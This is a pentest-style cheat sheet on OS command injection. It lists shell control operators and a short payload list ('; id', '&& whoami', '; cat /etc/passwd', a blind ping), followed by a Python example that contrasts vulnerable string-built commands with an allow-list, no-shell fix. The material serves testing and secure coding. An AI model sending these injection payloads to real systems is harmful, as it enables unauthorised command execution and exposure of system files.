Command injection

Command injection occurs when flaws in a web application allow the execution of OS commands. This typically occurs because inputs are not properly sanitized, allowing attackers to change or add to executed commands.

  • To identify potential command injection vulnerabilities, pay particular attention to functionality within web applications that is normally performed by OS commands

  • Use command line symbols in input fields to test for command injection

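    • ; (used to separate commands in Bash)

    • | (pipes the output of the first command into the second)

    • || (second command runs if first fails)

    • & (runs the first command in the background in Bash)

    • && (second command runs if first succeeds)

    • > (redirects output to a file, overwriting it)

    • >> (redirects output to a file, appending to it)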

  • Be sure to use commands specific to the target OS

    • cat vs. type

    • ping vs. ping -c

    • ls vs. dir

Payloads

command; id
command && whoami
command || ls (or dir depending on OS)
command; cat /etc/passwd
command; type C:\Windows\win.ini

Blind

command; ping -c5 $ipaddress
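
The root cause described above, next to its fix, as an added example that is not part of the original page. It assumes a hypothetical ping feature in a web application; the function names and the sample inputs are constructed for illustration.

```python
import ipaddress
import shlex

# Characters that make up the control operators listed above.
OPERATOR_CHARS = set(";|&>")


def vulnerable_command(host):
    """Anti-pattern: request input concatenated into a string handed to a shell."""
    return "ping -c 1 " + host


def shell_operators_in(command):
    """List operator tokens in the string, split the way a POSIX shell splits words.

    Quoted operators are reported too. Useful for tests and logging; it is
    not the defence (safe_argv is).
    """
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    try:
        return [tok for tok in lexer if tok and set(tok) <= OPERATOR_CHARS]
    except ValueError:  # unbalanced quote in the input
        return ["<unbalanced quote>"]


def safe_argv(host):
    """Hardened form: allow-list validation, then an argv list with no shell."""
    addr = ipaddress.ip_address(host)  # ValueError unless host is an IP literal
    # Pass the result to subprocess.run(argv, shell=False); nothing re-parses it.
    return ["ping", "-c", "1", str(addr)]


if __name__ == "__main__":
    # Constructed inputs modelled on the payload shapes listed above.
    for host in ["127.0.0.1", "127.0.0.1; id", "127.0.0.1 && whoami", "127.0.0.1 || ls"]:
        ops = shell_operators_in(vulnerable_command(host))
        try:
            verdict = "accepted as %r" % safe_argv(host)
        except ValueError:
            verdict = "rejected"
        print("%-22r shell sees %-8r hardened: %s" % (host, ops, verdict))
```

The hardened path never builds a command string, so the operator scan is only there to show what a shell would have been handed in the vulnerable path.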
